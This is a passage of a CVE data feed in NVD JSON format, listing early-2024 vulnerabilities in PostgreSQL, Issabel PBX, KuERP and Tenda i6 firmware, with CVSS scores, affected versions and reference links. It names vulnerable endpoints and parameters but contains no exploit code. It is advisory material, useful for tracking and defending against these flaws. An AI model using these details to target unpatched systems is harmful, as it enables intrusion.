in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to disable the image optimization setting." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:imagerecycle:imagerecycle_pdf_\\&_image_compression:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.1.14", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2024-12-27T16:08Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0985", "ASSIGNER" : "cna@postgresql.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00017.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00017.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://saites.dev/projects/personal/postgres-cve-2024-0985/", "name" : "https://saites.dev/projects/personal/postgres-cve-2024-0985/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.postgresql.org/support/security/CVE-2024-0985/", "name" : "https://www.postgresql.org/support/security/CVE-2024-0985/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.postgresql.org/support/security/CVE-2024-0985/", "name" : "https://www.postgresql.org/support/security/CVE-2024-0985/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://saites.dev/projects/personal/postgres-cve-2024-0985/", "name" : "https://saites.dev/projects/personal/postgres-cve-2024-0985/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20241220-0005/", "name" : "https://security.netapp.com/advisory/ntap-20241220-0005/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00017.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00017.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Late privilege drop in REFRESH MATERIALIZED VIEW CONCURRENTLY in PostgreSQL allows an object creator to execute arbitrary SQL functions as the command issuer. The command intends to run SQL functions as the owner of the materialized view, enabling safe refresh of untrusted materialized views. The victim is a superuser or member of one of the attacker's roles. The attack requires luring the victim into running REFRESH MATERIALIZED VIEW CONCURRENTLY on the attacker's materialized view. Versions before PostgreSQL 16.2, 15.6, 14.11, 13.14, and 12.18 are affected." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:postgresql:postgresql:*:*:*:*:*:*:*:*", "versionStartIncluding" : "15.0", "versionEndExcluding" : "15.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:postgresql:postgresql:*:*:*:*:*:*:*:*", "versionStartIncluding" : "14.0", "versionEndExcluding" : "14.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:postgresql:postgresql:*:*:*:*:*:*:*:*", "versionStartIncluding" : "13.0", "versionEndExcluding" : "13.14", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:postgresql:postgresql:*:*:*:*:*:*:*:*", "versionStartIncluding" : "12.0", "versionEndExcluding" : "12.18", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.0, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.1, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-08T13:15Z", "lastModifiedDate" : "2024-12-20T13:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0986", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/10BYLQ7Rk4oag96afLZouSvDDPvsO7SoJ/view?usp=drive_link", "name" : "https://drive.google.com/file/d/10BYLQ7Rk4oag96afLZouSvDDPvsO7SoJ/view?usp=drive_link", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.252251", "name" : "https://vuldb.com/?ctiid.252251", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252251", "name" : "https://vuldb.com/?id.252251", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.vicarius.io/vsociety/posts/issabel-authenticated-remote-code-execution-cve-2024-0986", "name" : "https://www.vicarius.io/vsociety/posts/issabel-authenticated-remote-code-execution-cve-2024-0986", "refsource" : "", "tags" : [ ] }, { "url" : "https://drive.google.com/file/d/10BYLQ7Rk4oag96afLZouSvDDPvsO7SoJ/view?usp=drive_link", "name" : "https://drive.google.com/file/d/10BYLQ7Rk4oag96afLZouSvDDPvsO7SoJ/view?usp=drive_link", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://www.vicarius.io/vsociety/posts/issabel-authenticated-remote-code-execution-cve-2024-0986", "name" : "https://www.vicarius.io/vsociety/posts/issabel-authenticated-remote-code-execution-cve-2024-0986", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?id.252251", "name" : "https://vuldb.com/?id.252251", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252251", "name" : "https://vuldb.com/?ctiid.252251", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:issabel:pbx:4.0.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T00:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0987", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-116" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/mhLwGOcLxYfP", "name" : "https://note.zhaoj.in/share/mhLwGOcLxYfP", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252252", "name" : "https://vuldb.com/?ctiid.252252", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252252", "name" : "https://vuldb.com/?id.252252", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://note.zhaoj.in/share/mhLwGOcLxYfP", "name" : "https://note.zhaoj.in/share/mhLwGOcLxYfP", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?id.252252", "name" : "https://vuldb.com/?id.252252", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252252", "name" : "https://vuldb.com/?ctiid.252252", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected is an unknown function of the file /runtime/log. The manipulation leads to improper output neutralization for logs. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252252. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kuerp_project:kuerp:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T00:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0988", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/2dBOnquxgCDl", "name" : "https://note.zhaoj.in/share/2dBOnquxgCDl", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252253", "name" : "https://vuldb.com/?ctiid.252253", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252253", "name" : "https://vuldb.com/?id.252253", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://note.zhaoj.in/share/2dBOnquxgCDl", "name" : "https://note.zhaoj.in/share/2dBOnquxgCDl", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?id.252253", "name" : "https://vuldb.com/?id.252253", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252253", "name" : "https://vuldb.com/?ctiid.252253", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this vulnerability is the function checklogin of the file /application/index/common.php. The manipulation of the argument App_User_id/App_user_Token leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-252253 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kuerp_project:kuerp:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T00:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0989", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/XKxaJTphW6PB", "name" : "https://note.zhaoj.in/share/XKxaJTphW6PB", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252254", "name" : "https://vuldb.com/?ctiid.252254", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252254", "name" : "https://vuldb.com/?id.252254", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://note.zhaoj.in/share/XKxaJTphW6PB", "name" : "https://note.zhaoj.in/share/XKxaJTphW6PB", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?id.252254", "name" : "https://vuldb.com/?id.252254", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252254", "name" : "https://vuldb.com/?ctiid.252254", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this issue is the function del_sn_db of the file /application/index/controller/Service.php. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-252254 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kuerp_project:kuerp:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T01:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0990", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetAutoPing-2e009d81eb7e45438565d5ba6794f4e3?pvs=4", "name" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetAutoPing-2e009d81eb7e45438565d5ba6794f4e3?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252255", "name" : "https://vuldb.com/?ctiid.252255", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252255", "name" : "https://vuldb.com/?id.252255", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetAutoPing-2e009d81eb7e45438565d5ba6794f4e3?pvs=4", "name" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetAutoPing-2e009d81eb7e45438565d5ba6794f4e3?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252255", "name" : "https://vuldb.com/?id.252255", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252255", "name" : "https://vuldb.com/?ctiid.252255", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Tenda i6 1.0.0.9(3857). This affects the function formSetAutoPing of the file /goform/setAutoPing of the component httpd. The manipulation of the argument ping1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252255. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:i6_firmware:1.0.0.9\\(3857\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:i6:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T01:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0991", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-9c9952ba7216422c8188e75c94bb531a?pvs=4", "name" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-9c9952ba7216422c8188e75c94bb531a?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252256", "name" : "https://vuldb.com/?ctiid.252256", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252256", "name" : "https://vuldb.com/?id.252256", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-9c9952ba7216422c8188e75c94bb531a?pvs=4", "name" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-9c9952ba7216422c8188e75c94bb531a?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252256", "name" : "https://vuldb.com/?id.252256", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252256", "name" : "https://vuldb.com/?ctiid.252256", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Tenda i6 1.0.0.9(3857) and classified as critical. This vulnerability affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252256. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:i6_firmware:1.0.0.9\\(3857\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:i6:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T01:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0992", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-f0e8be2eb0614e03a60160b48f8527f5?pvs=4", "name" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-f0e8be2eb0614e03a60160b48f8527f5?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252257", "name" : "https://vuldb.com/?ctiid.252257", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252257", "name" : "https://vuldb.com/?id.252257", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-f0e8be2eb0614e03a60160b48f8527f5?pvs=4", "name" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-f0e8be2eb0614e03a60160b48f8527f5?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252257", "name" : "https://vuldb.com/?id.252257", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252257", "name" : "https://vuldb.com/?ctiid.252257", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda i6 1.0.0.9(3857) and classified as critical. This issue affects the function formwrlSSIDset of the file /goform/wifiSSIDset of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252257 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:i6_firmware:1.0.0.9\\(3857\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:i6:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T01:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0993", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formWifiMacFilterGet-8b2c5cb67e2a433cad62d737782a7e0f?pvs=4", "name" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formWifiMacFilterGet-8b2c5cb67e2a433cad62d737782a7e0f?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252258", "name" : "https://vuldb.com/?ctiid.252258", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252258", "name" : "https://vuldb.com/?id.252258", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formWifiMacFilterGet-8b2c5cb67e2a433cad62d737782a7e0f?pvs=4", "name" : "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formWifiMacFilterGet-8b2c5cb67e2a433cad62d737782a7e0f?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252258", "name" : "https://vuldb.com/?id.252258", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252258", "name" : "https://vuldb.com/?ctiid.252258", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda i6 1.0.0.9(3857). It has been classified as critical. Affected is the function formWifiMacFilterGet of the file /goform/WifiMacFilterGet of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252258 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:i6_firmware:1.0.0.9\\(3857\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:i6:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T02:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0994", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : 